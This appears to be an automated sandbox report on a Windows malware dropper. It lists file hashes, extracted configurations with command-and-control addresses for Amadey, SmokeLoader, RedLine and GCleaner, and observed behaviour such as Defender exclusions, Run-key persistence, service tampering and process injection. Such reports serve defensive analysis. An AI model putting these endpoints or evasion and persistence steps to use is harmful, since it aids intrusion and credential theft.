Analysis
-
max time kernel
300s -
max time network
295s -
platform
windows10-1703_x64 -
resource
win10-20230621-en -
resource tags
arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system -
submitted
01/07/2023, 23:40
Static task
static1
Behavioral task
behavioral1
Sample
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
Resource
win10-20230621-en
General
-
Target
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
-
Size
4.2MB
-
MD5
ea191512e6ed56aa661ecb2deed1623e
-
SHA1
a2198ccd7d00ab727618ca2368f9f8c54b01c5d3
-
SHA256
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7
-
SHA512
7658e27038f60aa13df49bf48ac90a13cf77ef7e88e16453964b44e1cf9669ad3d06884692288a67a1dd3ffee89ce35e55750227e913bd3193dcc666f8bb8419
-
SSDEEP
98304:sHejdaMKBnK2t4x+GwYIb4jYfCmAcZmPcxkk9cRj5MQL:sHGdaTBnK2tHG2UMdWGLcRWE
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
redline
280623_rc_11
rcn.tuktuk.ug:11285
-
auth_value
7dbd026b7e6c26ab5e41958efd6a2a6e
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/memory/612-157-0x0000000002E70000-0x0000000002FA1000-memory.dmp family_fabookie behavioral2/memory/612-271-0x0000000002E70000-0x0000000002FA1000-memory.dmp family_fabookie -
Glupteba payload 1 IoCs
resource yara_rule behavioral2/memory/1472-273-0x0000000002E30000-0x000000000371B000-memory.dmp family_glupteba -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 34 IoCs
description pid Process procid_target PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 1084 created 3200 1084 conhost.exe 25 PID 4124 created 3200 4124 updater.exe 25 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3eef203fb515bda85f514e168abb5973.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 3948 netsh.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 27 IoCs
pid Process 612 aafg31.exe 828 oldplayer.exe 3636 XandETC.exe 3908 oneetx.exe 4888 setup.exe 1384 updEdge.exe 4612 updChrome.exe 4828 toolspub2.exe 4852 toolspub2.exe 4308 updEdge.exe 5088 oneetx.exe 3316 updChrome.exe 1472 3eef203fb515bda85f514e168abb5973.exe 720 updEdge.exe 1620 updChrome.exe 872 oneetx.exe 2496 3eef203fb515bda85f514e168abb5973.exe 4124 updater.exe 4936 updater.exe 4900 csrss.exe 3320 injector.exe 3824 windefender.exe 384 oneetx.exe 764 windefender.exe 4344 oneetx.exe 3400 f801950a962ddba14caaa44bf084b55c.exe 2128 oneetx.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000500000001af0c-4483.dat upx behavioral2/files/0x000500000001af0c-4506.dat upx behavioral2/files/0x000500000001af0c-4599.dat upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" 3eef203fb515bda85f514e168abb5973.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive WMIC.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4828 set thread context of 4852 4828 toolspub2.exe 87 PID 1384 set thread context of 680 1384 updEdge.exe 103 PID 4308 set thread context of 4788 4308 updEdge.exe 104 PID 720 set thread context of 3776 720 powercfg.exe 108 PID 4936 set thread context of 2400 4936 updater.exe 272 PID 4936 set thread context of 4164 4936 updater.exe 273 PID 4124 set thread context of 1084 4124 updater.exe 274 PID 4124 set thread context of 4104 4124 updater.exe 280 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\rss\csrss.exe 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 31 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4976 sc.exe 4812 sc.exe 3812 sc.exe 4932 sc.exe 2688 sc.exe 2056 sc.exe 2072 sc.exe 4164 sc.exe 4072 sc.exe 608 sc.exe 1836 sc.exe 2708 sc.exe 3560 sc.exe 2532 sc.exe 4060 sc.exe 4740 sc.exe 2668 sc.exe 4736 sc.exe 616 sc.exe 2500 sc.exe 4248 sc.exe 164 sc.exe 2396 sc.exe 984 sc.exe 4076 sc.exe 5036 sc.exe 4736 sc.exe 3360 sc.exe 1416 sc.exe 4896 sc.exe 4132 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 448 4888 WerFault.exe 80 3232 4888 WerFault.exe 80 4296 4888 WerFault.exe 80 5052 4888 WerFault.exe 80 4284 4888 WerFault.exe 80 424 4888 WerFault.exe 80 1596 4888 WerFault.exe 80 4344 4888 WerFault.exe 80 3424 4888 WerFault.exe 80 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3568 schtasks.exe 1656 schtasks.exe 5068 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1332 WMIC.exe -
Kills process with taskkill 1 IoCs
pid Process 1724 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WMIC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WMIC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 3eef203fb515bda85f514e168abb5973.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4852 toolspub2.exe 4852 toolspub2.exe 4612 updChrome.exe 4612 updChrome.exe 3316 updChrome.exe 3316 updChrome.exe 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3200 Explorer.EXE -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 648 Process not Found 648 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4852 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1384 updEdge.exe Token: SeDebugPrivilege 4308 updEdge.exe Token: SeDebugPrivilege 720 powercfg.exe Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeDebugPrivilege 1724 taskkill.exe Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeDebugPrivilege 4788 AppLaunch.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 3776 AppLaunch.exe Token: SeDebugPrivilege 4040 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeIncreaseQuotaPrivilege 2316 powershell.exe Token: SeSecurityPrivilege 2316 powershell.exe Token: SeTakeOwnershipPrivilege 2316 powershell.exe Token: SeLoadDriverPrivilege 2316 powershell.exe Token: SeSystemProfilePrivilege 2316 powershell.exe Token: SeSystemtimePrivilege 2316 powershell.exe Token: SeProfSingleProcessPrivilege 2316 powershell.exe Token: SeIncBasePriorityPrivilege 2316 powershell.exe Token: SeCreatePagefilePrivilege 2316 powershell.exe Token: SeBackupPrivilege 2316 powershell.exe Token: SeRestorePrivilege 2316 powershell.exe Token: SeShutdownPrivilege 2316 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeSystemEnvironmentPrivilege 2316 powershell.exe Token: SeRemoteShutdownPrivilege 2316 powershell.exe Token: SeUndockPrivilege 2316 powershell.exe Token: SeManageVolumePrivilege 2316 powershell.exe Token: 33 2316 powershell.exe Token: 34 2316 powershell.exe Token: 35 2316 powershell.exe Token: 36 2316 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 680 AppLaunch.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeSystemEnvironmentPrivilege 5068 powershell.exe Token: SeRemoteShutdownPrivilege 5068 powershell.exe Token: SeUndockPrivilege 5068 powershell.exe Token: SeManageVolumePrivilege 5068 powershell.exe Token: 33 5068 powershell.exe Token: 34 5068 powershell.exe Token: 35 5068 powershell.exe Token: 36 5068 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 3356 powershell.exe Token: SeSecurityPrivilege 3356 powershell.exe Token: SeTakeOwnershipPrivilege 3356 powershell.exe Token: SeLoadDriverPrivilege 3356 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
